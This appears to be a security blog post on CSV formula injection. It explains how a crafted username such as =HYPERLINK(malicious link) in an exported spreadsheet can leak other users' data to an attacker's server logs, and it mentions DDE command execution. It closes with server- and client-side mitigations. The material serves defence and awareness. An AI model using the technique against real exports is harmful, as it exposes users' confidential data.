CSV Macro Injection

CSV Macro Injection

CSV Injection, also known as Formula Injection, occurs when websites embed untrusted input inside CSV files.

CSV Injection, is an attack technique which we use in the day to day penetration testing of the application.

Are you on the watch for malware within spreadsheet exports of your banking transactions? Or how about within a .CSV back-up of your contacts list?

A Formula Injection (or Spreadsheet Formula Injection) vulnerability affects applications that export spreadsheet files which are dynamically constructed from inadequately validated input data. Once injected, it affects application end-users that access the application exported spreadsheet files. Successful exploitation can lead to impacts such as client-sided command injection, code execution or remote ex-filtration of contained confidential data.

CSV injection is a vulnerability which affects applications having the export spreadsheets functionality. These spreadsheets generate dynamically from invalidated or unfiltered user inputs. Modern web applications offer spreadsheet export function these days. This allows the user to download data in a .csv file format or .xls file format. This is suitable for handling spreadsheet applications like MS-Excel and OpenOffice Calc as a result of which the cells in the spreadsheets can contain inputs from untrusted source. As a result, the end user who is accessing the exported spreadsheet can be affected.

This vulnerability can be used by an attacker to execute attacks such as client-side command injection or code injection. Basically, the attack scenario for this is purely targeting the user(s) who download the Excel file naturally. We usually disregard this attack as a non-issue. However, websites should still be aware that the information they are exporting can potentially affect the users.

How does a simple CSV file pose a threat?

After downloading the CSV file, a user may choose to open it in spreadsheet software such as Microsoft Excel or LibreOffice. A malicious user could have inserted a malicious formula (starting with =) that got included in the CSV file when the data was exported. This happened due to the inability of the web application to properly sanitise the user input. When the file is opened in Excel or LibreOffice, the contents of the cell containing the formula might get executed.

Demonstration of CSV excel macro injection:

Stealing information 

In this case, let us see how the HYPERLINK function in LibreOffice can be leveraged by an attacker to exfiltrate sensitive data from the exported CSV file. The HYPERLINK function is used to insert an external link in the spreadsheet.

1. The attacker sets a malicious username(=HYPERLINK(malicious link)) in his profile. When the victim exports user-data.csv and open it with LibreOffice, the attacker’s username gets executed as a formula and shows an option of a link. The malicious CSV file looks like this.

2. The malicious CSV file looks like this in LibreOffice. As you can see the highlighted part in the image, it says that there has been an error which is just a misleading text with an external malicious link.

3. However unlikely, still if the victim clicks on the above link, this happens!

In reality, the attacker would be displaying, say a ‘404 Not Found’ message on the web page. The highlighted URL shows the contents of other users being exfiltrated. (I have used localhost to demonstrate this. In reality, an attacker would be using one of his domains).

4. But how would the attacker get this data? Logs! Yes, the web server logs would clearly show the exfiltrated data.

The above examples just demonstrate how it can be done. What can be done totally depends upon the attacker?

Remediation Strategy:

This attack is difficult to mitigate, and explicitly disallowed from quite a few bug bounty programs. To remediate it, ensure that no cells begin with any of the following characters:

Equals to ("=")

Plus ("+")

Minus ("-")

At ("@")

Server-side Mitigation

Mitigation mechanisms range from adding characters such as a single tick ‘ or a space before cells starting with an equals character = to HTMLEncoding special characters. However, consideration should be given to not break a legitimate user’s input-integrity. Several vendors were contacted about this vulnerability and while some classified it as a high-risk issue, others did not preserve it to be a significant application security risk.

Client-side Mitigation

In the latest OpenOffice Calc and LibreOffice Calc versions, the DDE Formula’s command execution functionality was revoked after the initial discovery of a command injection vulnerability (CVE-2014-3524).

In Microsoft Office’s Excel however, command injection is still possible with the exception of the security warnings which are believed to be an adequate defence measure. They say the following:

Warning 1: “Do not enable this content unless you trust the source of this file”.

Warning 2: “Only Click Yes, if you trust the source of this of this workbook”.

Note that the warnings ask the user to enable content only if they trust the source, which in this case they have no reason not to.

Additionally, [a reputable previous study] showed that up-to 50% of users choose to disregard most security warnings, which leans the issue towards being an inadequate security safeguard. [1] (http://scarybeastsecurity.blogspot.co.uk/2010_06_01_archive.html)

It may also be interesting to know that the RFC for CSVs states “CSV files contain passive text data that should not pose any risks”, but also that “private data may be shared via this format (which of course applies to any text data)”. Formulae contained within .CSV files are therefore supported by all major spreadsheet processors.

Conclusion

To conclude, Formula Injection can be mitigated on both the server and the client. However, if the client-side vendor finds the warnings sufficient and the server-side vendor cannot see any security implication, then the result seems to be a case if accepted risk of at least moderate likelihood. My endeavour has been to document this so as to improve awareness and reduce forced unknowing exposure.